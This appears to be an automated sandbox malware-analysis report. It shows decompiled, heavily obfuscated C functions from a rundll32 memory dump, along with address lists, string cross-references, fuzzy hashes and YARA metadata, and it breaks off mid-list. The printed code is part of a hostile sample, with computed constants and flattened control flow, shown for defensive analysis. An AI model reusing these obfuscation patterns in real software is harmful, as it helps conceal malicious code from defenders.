0x00358110
0x00000000
0x00358118
0x0035812a
0x003581f0
0x003581f5
0x00358200
0x00358201
0x00358210
0x00358215
0x00358218
0x00000000
0x00358218
0x00358132
0x00358164
0x0035816d
0x00358175
0x00358186
0x0035819e
0x003581b1
0x003581c6
0x003581cb
0x003581ce
0x00000000
0x003581ce
0x0035813a
0x0035825a
0x00358263
0x0035826d
0x00000000
0x0035827c
0x00358142
0x0035815d
0x00358155
0x00358155
0x00000000
0x00358155
0x00358146
0x00358239
0x00358239
0x0035823f
0x00000000
0x00000000
0x00000000
0x0035823f
0x00358150
0x00000000
0x00358150
0x00358222
0x00358227
0x0035822e
0x00358237
0x00000000
0x00358237
0x00358230
0x00000000

Strings

|[a, xrefs: 003580FA
MC=, xrefs: 00357F34
/, xrefs: 00358094
g^/h, xrefs: 003580AC

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: MC=$g^/h$|[a$/
API String ID: 0-1545830693
Opcode ID: 9484456d6d9d3d910f30cf280b7013ef4ee5836ec3488a198d2583f8704aeaf9
Instruction ID: 930568f4f9ee187071ce6449cc2b8a37a17fbdb0817b00c82a43481c65da70a3
Opcode Fuzzy Hash: 9484456d6d9d3d910f30cf280b7013ef4ee5836ec3488a198d2583f8704aeaf9
Instruction Fuzzy Hash: C5C10FB11083818FC369CF25C58A91BFBF1FBC0758F508A1DF5969A260D7B58A4ACF46

Uniqueness

Uniqueness Score: -1.00%

Function 0035A2E8 Relevance: 5.2, Strings: 4, Instructions: 201
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E0035A2E8(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v4;
				intOrPtr* _v8;
				intOrPtr _v12;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				intOrPtr _t184;
				intOrPtr* _t189;
				intOrPtr _t193;
				intOrPtr _t196;
				intOrPtr _t197;
				intOrPtr _t198;
				intOrPtr _t204;
				intOrPtr _t205;
				signed int _t223;
				signed int _t224;
				signed int _t225;
				intOrPtr _t226;
				void* _t228;
				signed int _t229;
				intOrPtr _t230;
				signed int* _t231;

				_t198 = __ecx;
				_t231 =  &_v92;
				_v8 = __edx;
				_v24 = __ecx;
				_v28 = 0x24c7b9;
				_v28 = _v28 << 9;
				_v28 = _v28 ^ 0x498f7200;
				_v76 = 0x5897f7;
				_v76 = _v76 + 0xffffedf4;
				_v76 = _v76 << 0xf;
				_v76 = _v76 + 0x73e5;
				_v76 = _v76 ^ 0x42f7f56f;
				_v52 = 0x46ab19;
				_v52 = _v52 << 0xd;
				_t228 = 0xe611c04;
				_v20 = _v20 & 0x00000000;
				_t223 = 0x66;
				_v52 = _v52 / _t223;
				_v52 = _v52 ^ 0x0211beab;
				_v80 = 0x97c948;
				_v80 = _v80 ^ 0xfb972484;
				_v80 = _v80 << 2;
				_v80 = _v80 << 0xf;
				_v80 = _v80 ^ 0xdb950905;
				_v44 = 0x96980f;
				_v44 = _v44 ^ 0xfeb8bb56;
				_v44 = _v44 ^ 0xfe2f3013;
				_v64 = 0x454cfa;
				_v64 = _v64 ^ 0x45fe36ac;
				_t224 = 0x43;
				_v64 = _v64 / _t224;
				_v64 = _v64 ^ 0x010b84d0;
				_v68 = 0xb73a82;
				_v68 = _v68 | 0xd419dac3;
				_t225 = 0x23;
				_v68 = _v68 / _t225;
				_v68 = _v68 ^ 0x061f1f3c;
				_v60 = 0xe80863;
				_v60 = _v60 * 7;
				_v60 = _v60 ^ 0x88fb80a0;
				_v60 = _v60 ^ 0x8ea007f2;
				_v40 = 0x80f530;
				_v40 = _v40 ^ 0xcef24483;
				_v40 = _v40 ^ 0xce7935e2;
				_v92 = 0x233377;
				_v92 = _v92 ^ 0x61e14959;
				_v92 = _v92 + 0xffffa5e4;
				_v92 = _v92 + 0xf94b;
				_v92 = _v92 ^ 0x61c7ad44;
				_v88 = 0xbad9cc;
				_v88 = _v88 | 0x5a2a09a8;
				_v88 = _v88 * 0x2f;
				_v88 = _v88 | 0xecc1c683;
				_v88 = _v88 ^ 0xecc3849f;
				_v56 = 0xb0d301;
				_v56 = _v56 + 0xa0bb;
				_v56 = _v56 << 0xf;
				_v56 = _v56 ^ 0xb9db0742;
				_v36 = 0xab48cf;
				_v36 = _v36 * 0x24;
				_v36 = _v36 ^ 0x1811952a;
				_v84 = 0x104632;
				_v84 = _v84 + 0x4a21;
				_v84 = _v84 ^ 0x8dbd106a;
				_v84 = _v84 + 0xfe54;
				_v84 = _v84 ^ 0x8daed025;
				_t226 = _v4;
				_t197 = _v8;
				_t230 = _v8;
				_v72 = 0x1611ea;
				_v72 = _v72 ^ 0xe055e86d;
				_v72 = _v72 >> 0xd;
				_v72 = _v72 >> 5;
				_v72 = _v72 ^ 0x0003993e;
				_v32 = 0x799484;
				_v32 = _v32 ^ 0xb4488d59;
				_v32 = _v32 ^ 0xb439947f;
				L1:
				while(1) {
					do {
						while(_t228 != 0x5161e0c) {
							if(_t228 == 0xb95f952) {
								_t229 = E0035C032( &_v16, _t198, _t184, _t230, _v44, _v64, _v68);
								_t231 =  &(_t231[5]);
								_v20 = _t229;
								if(_t229 == 0) {
									L18:
									E00358519(_v72, _v32, _t197);
								} else {
									_t204 = _v16;
									if(_t204 == 0) {
										L17:
										if(_t229 != 0) {
											_t189 = _v8;
											 *_t189 = _t197;
											 *((intOrPtr*)(_t189 + 4)) = _t226 - _t230;
										} else {
											goto L18;
										}
									} else {
										_v48 = _v48 + _t204;
										_t230 = _t230 - _t204;
										if(_t230 != 0) {
											L10:
											_t184 = _v48;
											L11:
											_t198 = _v24;
											_t228 = 0xb95f952;
											continue;
										} else {
											_t205 = _t226 + _t226;
											_push(_t205);
											_push(_t205);
											_v12 = _t205;
											_t193 = E00347FF2(_t205);
											_v48 = _t193;
											if(_t193 == 0) {
												goto L17;
											} else {
												E0034ED7E(_v88, _t193, _v56, _t197, _t226);
												E00358519(_v36, _v84, _t197);
												_t197 = _v48;
												_t230 = _t226;
												_t231 =  &(_t231[4]);
												_t196 = _t197 + _t226;
												_t226 = _v12;
												_v48 = _t196;
												if(_t230 == 0) {
													goto L17;
												} else {
													goto L10;
												}
											}
										}
									}
								}
							} else {
								if(_t228 != 0xe611c04) {
									goto L15;
								} else {
									_t228 = 0x5161e0c;
									continue;
								}
							}
							L20:
							return _t229;
						}
						_t226 = 0x10000;
						_push(_t198);
						_push(_t198);
						_t184 = E00347FF2(0x10000);
						_t197 = _t184;
						if(_t197 == 0) {
							_t198 = _v24;
							_t228 = 0xa3056fc;
							goto L15;
						} else {
							_v48 = _t184;
							_t230 = 0x10000;
							goto L11;
						}
						goto L20;
						L15:
						_t184 = _v48;
					} while (_t228 != 0xa3056fc);
					_t229 = _v20;
					goto L17;
				}
			}

0x0035a2e8
0x0035a2e8
0x0035a2ef
0x0035a2f3
0x0035a2f7
0x0035a2ff
0x0035a304
0x0035a30c
0x0035a314
0x0035a31c
0x0035a321
0x0035a329
0x0035a331
0x0035a339
0x0035a342
0x0035a34b
0x0035a350
0x0035a355
0x0035a35b
0x0035a363
0x0035a36b
0x0035a373
0x0035a378
0x0035a37d
0x0035a385
0x0035a38d
0x0035a395
0x0035a39d
0x0035a3a5
0x0035a3b1
0x0035a3b6
0x0035a3bc
0x0035a3c4
0x0035a3cc
0x0035a3d8
0x0035a3db
0x0035a3df
0x0035a3e7
0x0035a3f4
0x0035a3f8
0x0035a400
0x0035a408
0x0035a410
0x0035a418
0x0035a420
0x0035a428
0x0035a430
0x0035a438
0x0035a440
0x0035a448
0x0035a450
0x0035a45d
0x0035a461
0x0035a469
0x0035a471
0x0035a479
0x0035a481
0x0035a486
0x0035a48e
0x0035a49b
0x0035a49f
0x0035a4a7
0x0035a4af
0x0035a4b7
0x0035a4bf
0x0035a4c7
0x0035a4cf
0x0035a4d3
0x0035a4d7
0x0035a4df
0x0035a4e7
0x0035a4ef
0x0035a4f4
0x0035a4f9
0x0035a501
0x0035a509
0x0035a511
0x00000000
0x0035a519
0x0035a519
0x0035a519
0x0035a52b
0x0035a559
0x0035a55b
0x0035a55e
0x0035a564
0x0035a63c
0x0035a645
0x0035a56a
0x0035a56a
0x0035a570
0x0035a638
0x0035a63a
0x0035a651
0x0035a657
0x0035a659
0x00000000
0x00000000
0x00000000
0x0035a576
0x0035a576
0x0035a57a
0x0035a57c
0x0035a5df
0x0035a5df
0x0035a5e3
0x0035a5e3
0x0035a5e7
0x00000000
0x0035a57e
0x0035a582
0x0035a58f
0x0035a590
0x0035a591
0x0035a595
0x0035a59a
0x0035a5a2
0x00000000
0x0035a5a8
0x0035a5b4
0x0035a5c2
0x0035a5c7
0x0035a5cb
0x0035a5cd
0x0035a5d0
0x0035a5d3
0x0035a5d7
0x0035a5dd
0x00000000
0x00000000
0x00000000
0x00000000
0x0035a5dd
0x0035a5a2
0x0035a57c
0x0035a570
0x0035a52d
0x0035a533
0x00000000
0x0035a539
0x0035a539
0x00000000
0x0035a539
0x0035a533
0x0035a65d
0x0035a665
0x0035a665
0x0035a5f5
0x0035a604
0x0035a605
0x0035a606
0x0035a60b
0x0035a611
0x0035a61b
0x0035a61f
0x00000000
0x0035a613
0x0035a613
0x0035a617
0x00000000
0x0035a617
0x00000000
0x0035a624
0x0035a624
0x0035a628
0x0035a634
0x00000000
0x0035a634

Strings

!J, xrefs: 0035A4AF
mU, xrefs: 0035A4E7
YIa, xrefs: 0035A428
s, xrefs: 0035A321

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: !J$YIa$mU$s
API String ID: 0-3335770892
Opcode ID: a2c96b5523714fc353019ef791256b388c8b4530006014acc88a687be62f7107
Instruction ID: eeded52f8e3d9f3ab32a6892550f49b5dfe289decd488ff482842d900b89e706
Opcode Fuzzy Hash: a2c96b5523714fc353019ef791256b388c8b4530006014acc88a687be62f7107
Instruction Fuzzy Hash: 2C912EB19093809BC355CF69C18580BFBF1BBC5B58F548A1EF9D59B260D3B4DA098B83

Uniqueness

Uniqueness Score: -1.00%

Function 00344EE3 Relevance: 5.2, Strings: 4, Instructions: 168
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00344EE3(intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				char _v608;
				void* _t203;
				void* _t204;
				void* _t207;
				signed int _t212;
				signed int _t213;
				signed int _t214;
				signed int _t215;
				intOrPtr _t216;
				void* _t221;

				_v84 = _v84 & 0x00000000;
				_v88 = 0xf9097a;
				_v32 = 0xbcbe1d;
				_v32 = _v32 << 9;
				_v32 = _v32 << 9;
				_v32 = _v32 << 0xb;
				_v32 = _v32 ^ 0xa0062323;
				_v16 = 0x782140;
				_v16 = _v16 + 0xfffffe34;
				_v16 = _v16 + 0xfffffe18;
				_v16 = _v16 << 0xa;
				_v16 = _v16 ^ 0xe0701d9a;
				_v40 = 0x7af846;
				_v40 = _v40 + 0xffff28b3;
				_v40 = _v40 << 0xd;
				_v40 = _v40 + 0xffffd351;
				_v40 = _v40 ^ 0x441384bc;
				_v68 = 0xebfd4;
				_v68 = _v68 + 0xffff2b98;
				_t212 = 0x4b;
				_v68 = _v68 / _t212;
				_v68 = _v68 ^ 0x000f3184;
				_v48 = 0x77c678;
				_t213 = 0x72;
				_v48 = _v48 * 0x4d;
				_v48 = _v48 + 0x6b8c;
				_v48 = _v48 ^ 0x240efbe4;
				_v24 = 0xae1064;
				_v24 = _v24 / _t213;
				_v24 = _v24 << 7;
				_v24 = _v24 ^ 0x1be7fa9d;
				_v24 = _v24 ^ 0x1b226397;
				_v72 = 0x44bde7;
				_v72 = _v72 | 0x5f63ee23;
				_v72 = _v72 ^ 0x5f6de837;
				_v56 = 0x5a94a4;
				_v56 = _v56 >> 9;
				_t214 = 0xc;
				_v56 = _v56 * 0x2a;
				_v56 = _v56 ^ 0x0003dc1b;
				_v8 = 0x2a4d30;
				_v8 = _v8 + 0xff2b;
				_v8 = _v8 | 0x9a82811b;
				_v8 = _v8 << 0xc;
				_v8 = _v8 ^ 0xbcdbc31f;
				_v64 = 0xa41a91;
				_v64 = _v64 | 0x62aa1889;
				_v64 = _v64 << 0xd;
				_v64 = _v64 ^ 0xc357e7aa;
				_v36 = 0x90fe9;
				_v36 = _v36 >> 0xa;
				_v36 = _v36 | 0x57d87c49;
				_v36 = _v36 / _t214;
				_v36 = _v36 ^ 0x0755636a;
				_v28 = 0x5fda7e;
				_v28 = _v28 + 0xffff2d0f;
				_v28 = _v28 << 0xa;
				_v28 = _v28 + 0xdffb;
				_v28 = _v28 ^ 0x7c1a8a5e;
				_v20 = 0xaf632f;
				_v20 = _v20 >> 8;
				_v20 = _v20 << 9;
				_v20 = _v20 >> 0xf;
				_v20 = _v20 ^ 0x0003fa93;
				_v12 = 0x960758;
				_v12 = _v12 ^ 0x64ee01f0;
				_v12 = _v12 | 0x3d3dd2ba;
				_v12 = _v12 << 7;
				_v12 = _v12 ^ 0xbeed48c5;
				_v80 = 0xba0fdf;
				_v80 = _v80 + 0xfd2d;
				_v80 = _v80 ^ 0x00b93168;
				_v60 = 0x5f834c;
				_v60 = _v60 ^ 0x963b7b6a;
				_t215 = 0x3f;
				_v60 = _v60 * 0x3e;
				_v60 = _v60 ^ 0x6c73d449;
				_v76 = 0x4b89c6;
				_v76 = _v76 >> 6;
				_v76 = _v76 ^ 0x0008f57a;
				_v52 = 0x3d488e;
				_v52 = _v52 << 6;
				_v52 = _v52 << 8;
				_v52 = _v52 ^ 0x5226582a;
				_v44 = 0x8cf369;
				_v44 = _v44 ^ 0x25329c0c;
				_v44 = _v44 / _t215;
				_v44 = _v44 >> 0xe;
				_v44 = _v44 ^ 0x0005c7da;
				_t216 =  *0x363e10; // 0x0
				_t203 = E0034B6CF(_t216 + 0x1c, _v32, _v16, _v40);
				_t241 = _a4 + 0x2c;
				_t204 = E0034B23C(_v68, _v48, _a4 + 0x2c, _v24, _v72, _t203);
				_t248 = _t204;
				if(_t204 != 0) {
					_push(_v64);
					_push(_v8);
					_t207 = E0035DCF7(_v56, 0x341000, _t248);
					_pop(_t221);
					E003447CE( *((intOrPtr*)(_a8 + 0x18)), _v36, _t221, _v28, _v20, _t207, _t241, _v12, _v80);
					E0034A8B0(_v60, _t207, _v76);
					E00351F8A(_v52, _v44,  &_v608);
				}
				return 1;
			}

0x00344eec
0x00344ef2
0x00344ef9
0x00344f00
0x00344f04
0x00344f08
0x00344f0c
0x00344f13
0x00344f1a
0x00344f21
0x00344f28
0x00344f2c
0x00344f33
0x00344f3a
0x00344f41
0x00344f45
0x00344f4c
0x00344f53
0x00344f5a
0x00344f67
0x00344f6c
0x00344f71
0x00344f78
0x00344f83
0x00344f86
0x00344f89
0x00344f90
0x00344f97
0x00344fa5
0x00344fa8
0x00344fac
0x00344fb3
0x00344fba
0x00344fc1
0x00344fc8
0x00344fcf
0x00344fd6
0x00344fde
0x00344fdf
0x00344fe2
0x00344fe9
0x00344ff0
0x00344ff7
0x00344ffe
0x00345002
0x00345009
0x00345010
0x00345017
0x0034501b
0x00345022
0x00345029
0x0034502d
0x00345039
0x0034503c
0x00345043
0x0034504a
0x00345051
0x00345055
0x0034505c
0x00345063
0x0034506a
0x0034506e
0x00345072
0x00345076
0x0034507d
0x00345084
0x0034508b
0x00345094
0x00345098
0x0034509f
0x003450a6
0x003450ad
0x003450b4
0x003450bb
0x003450c8
0x003450c9
0x003450cc
0x003450d3
0x003450da
0x003450de
0x003450e5
0x003450ec
0x003450f0
0x003450f4
0x003450fb
0x00345102
0x0034510e
0x00345111
0x00345115
0x00345122
0x0034512e
0x0034513a
0x00345147
0x0034514f
0x00345151
0x00345154
0x0034515c
0x00345162
0x0034516d
0x00345189
0x00345196
0x003451a8
0x003451b0
0x003451b8

Strings

0M*, xrefs: 00344FE9
*X&R, xrefs: 003450F4
@!x, xrefs: 00344F13
7m_, xrefs: 00344FC8

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID: *X&R$0M*$7m_$@!x
API String ID: 1586166983-4050865940
Opcode ID: 62c1d1b7ad0931b005513febeff68388c207e39a5f287c45cddff4f39376581b
Instruction ID: ab01380d268afc32eeb799dfabfad11eed1ed70f4851bb82012012588ab25823
Opcode Fuzzy Hash: 62c1d1b7ad0931b005513febeff68388c207e39a5f287c45cddff4f39376581b
Instruction Fuzzy Hash: 53810272C0121DABCF49DFA1D88A9EEFBB1FB44718F208118E511B6260D7B55A4ACF54

Uniqueness

Uniqueness Score: -1.00%

Function 0034EA99 Relevance: 5.2, Strings: 4, Instructions: 153
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E0034EA99(void* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				void* _t136;
				signed int _t147;
				void* _t150;
				intOrPtr* _t152;
				void* _t154;
				void* _t165;
				signed int _t166;
				signed int _t167;
				signed int* _t171;

				_push(_a16);
				_t152 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003520B9(_t136);
				_v52 = 0x4b44d9;
				_t171 =  &(( &_v68)[6]);
				_t165 = 0;
				_t154 = 0x40ad1f2;
				_t166 = 0x41;
				_v52 = _v52 * 0x5c;
				_v52 = _v52 ^ 0xd486af61;
				_v52 = _v52 ^ 0xcf8a129f;
				_v24 = 0x8b17cc;
				_v24 = _v24 + 0xffff02b5;
				_v24 = _v24 ^ 0x008a1a91;
				_v64 = 0xcc4e1;
				_v64 = _v64 ^ 0x71537a57;
				_v64 = _v64 | 0xbc84d226;
				_v64 = _v64 + 0x8a58;
				_v64 = _v64 ^ 0xbde0890e;
				_v12 = 0x10173e;
				_v12 = _v12 / _t166;
				_v12 = _v12 ^ 0x000bb2e7;
				_v16 = 0xcbf18d;
				_v16 = _v16 + 0x7f8c;
				_v16 = _v16 ^ 0x00cd0dea;
				_v20 = 0x7a67ce;
				_v20 = _v20 << 1;
				_v20 = _v20 ^ 0x00fa626e;
				_v68 = 0x7779f8;
				_v68 = _v68 + 0xa85e;
				_v68 = _v68 << 0x10;
				_v68 = _v68 >> 3;
				_v68 = _v68 ^ 0x0443aeb4;
				_v28 = 0xee6391;
				_v28 = _v28 ^ 0x2bfa2339;
				_v28 = _v28 ^ 0x2b1bacd2;
				_v32 = 0x87b642;
				_v32 = _v32 + 0xffff3baa;
				_v32 = _v32 ^ 0x008fda80;
				_v36 = 0x3b697f;
				_v36 = _v36 | 0x5675f49c;
				_v36 = _v36 ^ 0x5679bffa;
				_v40 = 0x254a84;
				_v40 = _v40 * 0x67;
				_v40 = _v40 ^ 0x0f0bd396;
				_v44 = 0xfc206d;
				_v44 = _v44 * 0x45;
				_v44 = _v44 ^ 0x43f6aa11;
				_v56 = 0x3dd941;
				_v56 = _v56 ^ 0x94d2d45c;
				_v56 = _v56 >> 9;
				_v56 = _v56 ^ 0x00419011;
				_v4 = 0xdcf5c3;
				_v4 = _v4 ^ 0x0d464ae6;
				_v4 = _v4 ^ 0x0d938ce3;
				_v60 = 0xe23f0;
				_v60 = _v60 ^ 0x0435e191;
				_v60 = _v60 ^ 0xbde67646;
				_v60 = _v60 ^ 0xb922f804;
				_v60 = _v60 ^ 0x00f2260b;
				_v8 = 0x523a90;
				_v8 = _v8 * 0x75;
				_v8 = _v8 ^ 0x259e6962;
				_v48 = 0x46565e;
				_t167 = 3;
				_v48 = _v48 * 0x6a;
				_t168 = _v4;
				_v48 = _v48 / _t167;
				_v48 = _v48 ^ 0x09b4f31e;
				do {
					while(_t154 != 0x40ad1f2) {
						if(_t154 == 0x458d12f) {
							_t147 = E00348F65(_v12, _v16, _a12, _v20, _v24, _t154, _v64, _v68, _v52, _v28, _t154, 0);
							_t168 = _t147;
							_t171 =  &(_t171[0xa]);
							if(_t147 != 0xffffffff) {
								_t154 = 0x4af2a99;
								continue;
							}
						} else {
							if(_t154 == 0x4af2a99) {
								_t150 = E003419B8(_t154, _v36,  *((intOrPtr*)(_t152 + 4)), _v40, _t168, _v44, _v56, _t152 + 4,  *_t152);
								_t171 =  &(_t171[8]);
								_t165 = _t150;
								_t154 = 0xe5b5021;
								continue;
							} else {
								if(_t154 != 0xe5b5021) {
									goto L11;
								} else {
									E00351E67(_v4, _v60, _v8, _v48, _t168);
								}
							}
						}
						L6:
						return _t165;
					}
					_t154 = 0x458d12f;
					L11:
				} while (_t154 != 0xd2f352d);
				goto L6;
			}

0x0034eaa0
0x0034eaa4
0x0034eaa6
0x0034eaaa
0x0034eaae
0x0034eab2
0x0034eab3
0x0034eab4
0x0034eab9
0x0034eac1
0x0034eacb
0x0034eacd
0x0034ead4
0x0034ead5
0x0034ead9
0x0034eae1
0x0034eae9
0x0034eaf1
0x0034eaf9
0x0034eb01
0x0034eb09
0x0034eb11
0x0034eb19
0x0034eb21
0x0034eb29
0x0034eb37
0x0034eb3b
0x0034eb43
0x0034eb4b
0x0034eb53
0x0034eb5b
0x0034eb63
0x0034eb67
0x0034eb6f
0x0034eb77
0x0034eb7f
0x0034eb84
0x0034eb89
0x0034eb91
0x0034eb99
0x0034eba1
0x0034eba9
0x0034ebb1
0x0034ebb9
0x0034ebc1
0x0034ebc9
0x0034ebd1
0x0034ebd9
0x0034ebe6
0x0034ebea
0x0034ebf2
0x0034ebff
0x0034ec03
0x0034ec0b
0x0034ec13
0x0034ec1b
0x0034ec20
0x0034ec28
0x0034ec30
0x0034ec38
0x0034ec40
0x0034ec48
0x0034ec50
0x0034ec58
0x0034ec60
0x0034ec68
0x0034ec75
0x0034ec79
0x0034ec81
0x0034ec92
0x0034ec98
0x0034eca2
0x0034eca6
0x0034ecaa
0x0034ecb2
0x0034ecb2
0x0034ecc0
0x0034ed52
0x0034ed57
0x0034ed59
0x0034ed5f
0x0034ed61
0x00000000
0x0034ed61
0x0034ecc2
0x0034ecc8
0x0034ed16
0x0034ed1b
0x0034ed1e
0x0034ed20
0x00000000
0x0034ecca
0x0034ecd0
0x00000000
0x0034ecd6
0x0034ece7
0x0034ecec
0x0034ecd0
0x0034ecc8
0x0034ecef
0x0034ecf8
0x0034ecf8
0x0034ed6b
0x0034ed6d
0x0034ed6d
0x00000000

Strings

JF, xrefs: 0034EC30
^VF, xrefs: 0034EC81
WzSq, xrefs: 0034EB09
-5/, xrefs: 0034ED6D

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: -5/$WzSq$^VF$JF
API String ID: 0-2399144359
Opcode ID: 1a99258aef2ebd0cedbce0666f862dafcadd34ac8b3dd1b99f29c3393997e72b
Instruction ID: 2219fddaf0237d8a3bafee6309abd7a775c4051b5d79791687b764eac5976a03
Opcode Fuzzy Hash: 1a99258aef2ebd0cedbce0666f862dafcadd34ac8b3dd1b99f29c3393997e72b
Instruction Fuzzy Hash: 1F7121714083419FC759DF65C98681BBBE2FBC9758F104A1DF6969A220C3B1DA48DF83

Uniqueness

Uniqueness Score: -1.00%

Function 00359BCF Relevance: 5.1, Strings: 4, Instructions: 133
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00359BCF() {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				unsigned int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _t111;
				signed int _t115;
				signed int _t117;
				void* _t118;
				signed int _t132;
				void* _t134;
				signed int _t135;
				signed int* _t136;

				_t136 =  &_v568;
				_v560 = 0x297e3c;
				_v560 = _v560 >> 9;
				_t118 = 0x4ead2fe;
				_v560 = _v560 + 0xe8be;
				_v560 = _v560 ^ 0xc9c09221;
				_v560 = _v560 ^ 0xc9c20db8;
				_v540 = 0x190e1d;
				_v540 = _v540 >> 7;
				_v540 = _v540 >> 0xd;
				_v540 = _v540 ^ 0x000cdd3b;
				_v544 = 0x86c2f0;
				_v544 = _v544 | 0x0d7eac20;
				_v544 = _v544 ^ 0xe6b61282;
				_v544 = _v544 ^ 0xeb41e563;
				_v552 = 0x262f60;
				_v552 = _v552 ^ 0x76c91adc;
				_v552 = _v552 + 0xd1c5;
				_v552 = _v552 ^ 0x76fc323e;
				_v524 = 0xf427e0;
				_v524 = _v524 + 0xffff22a3;
				_v524 = _v524 ^ 0x00f85f52;
				_v548 = 0xdbc1a5;
				_v548 = _v548 >> 0xb;
				_v548 = _v548 + 0xf615;
				_v548 = _v548 ^ 0x0006ff3e;
				_v556 = 0xd2f840;
				_v556 = _v556 * 0x5f;
				_t134 = 0;
				_v556 = _v556 ^ 0x4e4cccaa;
				_v568 = 0x74ecfa;
				_t132 = 0x53;
				_t133 = _v556;
				_v568 = _v568 / _t132;
				_v568 = _v568 ^ 0xc72664ff;
				_v568 = _v568 << 0xf;
				_v568 = _v568 ^ 0x862d9f40;
				_v536 = 0xc0d44a;
				_v536 = _v536 + 0x396d;
				_t135 = _v556;
				_t117 = _v556;
				_v536 = _v536 * 0x46;
				_v536 = _v536 ^ 0x34c6c601;
				_v532 = 0xf37e83;
				_v532 = _v532 << 8;
				_v532 = _v532 | 0x760e0a19;
				_v532 = _v532 ^ 0xf77c332a;
				_v528 = 0x91f8e3;
				_v528 = _v528 ^ 0xc904aca2;
				_v528 = _v528 ^ 0xc9900919;
				do {
					while(_t118 != 0x27fe330) {
						if(_t118 == 0x4ead2fe) {
							_t118 = 0x96d401d;
							continue;
						} else {
							if(_t118 == 0x7ac597b) {
								_t117 = E0034B6CF( &_v520, _v548, _v556, _v568);
								_t118 = 0xa7595e6;
								continue;
							} else {
								if(_t118 == 0x80b0e4e) {
									_t90 =  &_v552; // 0xeb41e563
									_t111 = E00349B83(_t133, __eflags, _v544,  *_t90,  &_v520, _v524);
									_t136 =  &(_t136[4]);
									__eflags = _t111;
									if(__eflags != 0) {
										_t118 = 0x7ac597b;
										continue;
									}
								} else {
									if(_t118 == 0x96d401d) {
										_t115 = E003452C2();
										_t133 = _t115;
										__eflags = _t115;
										if(__eflags != 0) {
											_t118 = 0x80b0e4e;
											continue;
										}
									} else {
										if(_t118 != 0xa7595e6) {
											goto L15;
										} else {
											_t135 = E00342051(_v532, _t117, _v528);
											_t118 = 0x27fe330;
											continue;
										}
									}
								}
							}
						}
						goto L16;
					}
					_v564 = 0x69bdc3;
					_v564 = _v564 | 0xfd1bce6c;
					_v564 = _v564 ^ 0xf153ffb6;
					_v564 = _v564 ^ 0x260f00bb;
					__eflags = _t135 - _v564;
					_t134 =  ==  ? 1 : _t134;
					_t118 = 0x8b668cc;
					L15:
					__eflags = _t118 - 0x8b668cc;
				} while (__eflags != 0);
				L16:
				return _t134;
			}

0x00359bcf
0x00359bd9
0x00359be3
0x00359be8
0x00359bed
0x00359bf5
0x00359bfd
0x00359c05
0x00359c0d
0x00359c12
0x00359c17
0x00359c1f
0x00359c27
0x00359c2f
0x00359c37
0x00359c3f
0x00359c47
0x00359c4f
0x00359c57
0x00359c5f
0x00359c67
0x00359c6f
0x00359c77
0x00359c7f
0x00359c84
0x00359c8c
0x00359c94
0x00359ca1
0x00359ca5
0x00359ca7
0x00359caf
0x00359cbd
0x00359cc0
0x00359cc4
0x00359cc8
0x00359cd0
0x00359cd5
0x00359cdd
0x00359ce5
0x00359cf2
